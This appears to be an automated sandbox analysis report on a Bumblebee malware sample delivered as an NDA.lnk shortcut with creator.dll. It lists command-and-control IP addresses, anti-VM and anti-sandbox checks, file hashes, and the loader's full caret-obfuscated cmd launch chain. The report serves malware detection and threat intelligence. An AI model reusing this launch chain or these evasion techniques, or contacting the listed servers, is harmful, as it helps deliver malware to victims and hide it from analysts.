Analysis
max time kernel: 117s
max time network: 119s
platform: windows7_x64
resource: win7-20241023-en
submitted: 29-11-2024 13:02
Static task: static1
Behavioral task: behavioral1 (Sample: NDA.lnk, Resource: win7-20241023-en)
Behavioral task: behavioral2 (Sample: NDA.lnk, Resource: win10v2004-20241007-en)
Behavioral task: behavioral3 (Sample: creator.dll, Resource: win7-20240903-en)
Behavioral task: behavioral4 (Sample: creator.dll, Resource: win10v2004-20241007-en)
Malware Config
Extracted: bumblebee
0310
146.59.117.200:443
192.255.188.11:443
149.3.170.62:443
Signatures
Bumblebee family
Enumerates VirtualBox registry keys (2 TTPs, 5 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest | rundll32.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse | rundll32.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService | rundll32.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF | rundll32.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo | rundll32.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 3 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__ | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__ | rundll32.exe
Looks for VirtualBox Guest Additions in registry (2 TTPs, 1 IoC)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions | rundll32.exe
Checks BIOS information in registry (2 TTPs, 3 IoCs)
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rundll32.exe
Executes dropped EXE (1 IoC)
pid | Process
2940 | rundll32.exe
Identifies Wine through registry keys (2 TTPs, 1 IoC)
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Wine | rundll32.exe
Loads dropped DLL (5 IoCs)
pid | Process
2820 | cmd.exe
2940 | rundll32.exe
2940 | rundll32.exe
2940 | rundll32.exe
2940 | rundll32.exe
Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
pid | Process
2940 | rundll32.exe
Checks for VirtualBox DLLs, possible anti-VM trick (1 TTP, 1 IoC)
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description | ioc | Process
File opened (read-only) | \??\VBoxMiniRdrDN | rundll32.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Delays execution with timeout.exe (1 IoC)
pid | Process
2908 | timeout.exe
Suspicious behavior: EnumeratesProcesses (42 IoCs)
pid | Process
2940 | rundll32.exe (42 identical entries)
Suspicious use of WriteProcessMemory (15 IoCs)
description | pid | Process | procid_target
PID 2604 wrote to memory of 2820 | 2604 | cmd.exe | 31 (listed 3 times)
PID 2820 wrote to memory of 2884 | 2820 | cmd.exe | 32 (listed 3 times)
PID 2820 wrote to memory of 2888 | 2820 | cmd.exe | 33 (listed 3 times)
PID 2820 wrote to memory of 2908 | 2820 | cmd.exe | 34 (listed 3 times)
PID 2820 wrote to memory of 2940 | 2820 | cmd.exe | 35 (listed 3 times)
Processes
C:\Windows\system32\cmd.exe
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\NDA.lnk
  PID: 2604
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c start /b /min xco^py /y C:\Windows\System32\rund*.exe c:\programdata && start /b /min xco^py /h /y cr^eat^or.dll c:\programdata && cd c:\programdata && timeout 1 && start /b /min r^u^ndll32.exe creator.dll,runprog && exit
    PID: 2820
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\xcopy.exe
      Command line: xcopy /y C:\Windows\System32\rund*.exe c:\programdata
      PID: 2884
    C:\Windows\system32\xcopy.exe
      Command line: xcopy /h /y creator.dll c:\programdata
      PID: 2888
    C:\Windows\system32\timeout.exe
      Command line: timeout 1
      PID: 2908
      - Delays execution with timeout.exe
    \??\c:\ProgramData\rundll32.exe
      Command line: rundll32.exe creator.dll,runprog
      PID: 2940
      - Enumerates VirtualBox registry keys
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Looks for VirtualBox Guest Additions in registry
      - Checks BIOS information in registry
      - Executes dropped EXE
      - Identifies Wine through registry keys
      - Loads dropped DLL
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Checks for VirtualBox DLLs, possible anti-VM trick
      - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 2.8MB
MD5: f7e264d654ad023794222f1e2fa866e6
SHA1: 0f5a405879ce713986b4940a51158bd2ee99e750
SHA256: 177a9689065b14408eb7af71432ec9a621d56fba5182cd74f3690e989a95d023
SHA512: 82bd12740934ff7608419770fd205f0ddd57bd418ecee827834866414cda9265e9600ad7931097942838df4dddcc751c0e31b1e5736c4e3f52e054c5e7bf2f6b

Filesize: 44KB
MD5: dd81d91ff3b0763c392422865c9ac12e
SHA1: 963b55acc8c566876364716d5aafa353995812a8
SHA256: f5691b8f200e3196e6808e932630e862f8f26f31cd949981373f23c9d87db8b9
SHA512: 8a5036ccab9c9e71deb4ecb9598528ca19c2d697a836846d23e1547b24172fa236a798092c7db676929abff830e40f52ce8f3b3bdd8d4c2553d7c021fceaf120